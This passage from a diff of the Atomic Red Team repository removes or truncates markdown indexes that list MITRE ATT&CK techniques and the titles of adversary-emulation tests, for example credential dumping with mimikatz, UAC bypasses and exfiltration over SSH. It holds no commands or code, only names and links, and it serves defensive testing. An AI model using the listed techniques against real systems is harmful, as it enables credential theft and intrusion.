- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1059.007 JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1569.001 Launchctl](../../T1569.001/T1569.001.md)
- Atomic Test #1: Launchctl [macos]
- [T1053.004 Launchd](../../T1053.004/T1053.004.md)
- Atomic Test #1: Event Monitor Daemon Persistence [macos]
- T1204.002 Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1106 Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.004 Unix Shell](../../T1059.004/T1059.004.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- Atomic Test #2: Command-Line Interface [macos, linux]
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1059.005 Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# command-and-control
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1071.004 DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573 Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
- Atomic Test #3: scp remote file copy (push) [linux, macos]
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #14: whois file download [linux, macos]
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- Atomic Test #2: Connection Proxy for macOS UI [macos]
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090.003 Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1095 Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1219 Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071.001 Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# exfiltration
- T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1567.002 Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# initial-access
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1566.001 Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# lateral-movement
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1021.004 SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1021.005 VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
atomics/Indexes/Indexes-Markdown/windows-index.md
-1157
View File
@@ -1,1157 +0,0 @@
# Windows Atomic Tests by ATT&CK Tactic & Technique
# credential-access
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1558.004 AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #3: Extracting passwords with findstr [windows]
- Atomic Test #4: Access unattend.xml [windows]
- [T1555 Credentials from Password Stores](../../T1555/T1555.md)
- Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
- Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
- Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
- Atomic Test #3: LaZagne - Credentials from Browser [windows]
- [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
- [T1003.006 DCSync](../../T1003.006/T1003.006.md)
- Atomic Test #1: DCSync (Active Directory) [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1187 Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- [T1558.001 Golden Ticket](../../T1558.001/T1558.001.md)
- Atomic Test #1: Crafting Active Directory golden tickets with mimikatz [windows]
- [T1552.006 Group Policy Preferences](../../T1552.006/T1552.006.md)
- Atomic Test #1: GPP Passwords (findstr) [windows]
- Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1558.003 Kerberoasting](../../T1558.003/T1558.003.md)
- Atomic Test #1: Request for service tickets [windows]
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.004 LSA Secrets](../../T1003.004/T1003.004.md)
- Atomic Test #1: Dumping LSA Secrets [windows]
- [T1003.001 LSASS Memory](../../T1003.001/T1003.001.md)
- Atomic Test #1: Windows Credential Editor [windows]
- Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows]
- Atomic Test #3: Dump LSASS.exe Memory using comsvcs.dll [windows]
- Atomic Test #4: Dump LSASS.exe Memory using direct system calls and API unhooking [windows]
- Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows]
- Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
- Atomic Test #7: LSASS read with pypykatz [windows]
- Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
- Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
- Atomic Test #10: Powershell Mimikatz [windows]
- Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
- Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.003 NTDS](../../T1003.003/T1003.003.md)
- Atomic Test #1: Create Volume Shadow Copy with vssadmin [windows]
- Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows]
- Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
- Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
- Atomic Test #5: Create Volume Shadow Copy with Powershell [windows]
- Atomic Test #6: Create Symlink to Volume Shadow Copy [windows]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Windows Internal Packet Capture [windows]
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- Atomic Test #1: Gsecdump [windows]
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
- Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows]
- [T1110.002 Password Cracking](../../T1110.002/T1110.002.md)
- Atomic Test #1: Password Cracking with Hashcat [windows]
- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- [T1110.001 Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #1: Brute Force Credentials of all Active Directory domain users via SMB [windows]
- Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #1: Password Spray all Domain Users [windows]
- Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
- Atomic Test #3: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows]
- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #1: Private Keys [windows]
- T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
- Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
- Atomic Test #2: Registry parse with pypykatz [windows]
- Atomic Test #3: esentutl.exe SAM copy [windows]
- Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows]
- T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1555.004 Windows Credential Manager [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# collection
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1560 Archive Collected Data](../../T1560/T1560.md)
- Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #1: Compress Data for Exfiltration With Rar [windows]
- Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
- Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
- Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
- [T1123 Audio Capture](../../T1123/T1123.md)
- Atomic Test #1: using device audio capture commandlet [windows]
- [T1119 Automated Collection](../../T1119/T1119.md)
- Atomic Test #1: Automated Collection Command Prompt [windows]
- Atomic Test #2: Automated Collection PowerShell [windows]
- Atomic Test #3: Recon information for export with PowerShell [windows]
- Atomic Test #4: Recon information for export with Command Prompt [windows]
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
- Atomic Test #2: Execute Commands from Clipboard using PowerShell [windows]
- Atomic Test #4: Collect Clipboard Data via VBA [windows]
- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #1: Stage data from Discovery.bat [windows]
- Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
- [T1114.001 Local Email Collection](../../T1114.001/T1114.001.md)
- Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
- T1185 Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #5: Windows Screencapture [windows]
- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# privilege-escalation
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
- [T1546.011 Application Shimming](../../T1546.011/T1546.011.md)
- Atomic Test #1: Application Shim Installation [windows]
- Atomic Test #2: New shim database files created in the default shim database directory [windows]
- Atomic Test #3: Registry key creation and/or modification events for SDB [windows]
- [T1055.004 Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
- Atomic Test #1: Process Injection via C# [windows]
- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
- Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- T1611 Escape to Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484.001 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- T1547.008 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin priviliges [windows]
- [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md)
- Atomic Test #1: Logon Scripts [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.007 Netsh Helper DLL](../../T1546.007/T1546.007.md)
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
- Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
- Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
- Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
- Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md)
- Atomic Test #1: Add Port Monitor persistence in Registry [windows]
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1055.012 Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- Atomic Test #2: RunPE via VBA [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Shellcode execution via VBA [windows]
- Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
- [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
- Atomic Test #3: PowerShell Registry RunOnce [windows]
- Atomic Test #4: Suspicious vbs file run from startup Folder [windows]
- Atomic Test #5: Suspicious jse file run from startup Folder [windows]
- Atomic Test #6: Suspicious bat file run from startup Folder [windows]
- Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
- T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- [T1547.005 Security Support Provider](../../T1547.005/T1547.005.md)
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md)
- Atomic Test #1: Shortcut Modification [windows]
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md)
- Atomic Test #1: Named pipe client impersonation [windows]
- Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
- Atomic Test #1: Persistence via WMI Event Subscription [windows]
- [T1543.003 Windows Service](../../T1543.003/T1543.003.md)
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
- Atomic Test #2: Service Installation CMD [windows]
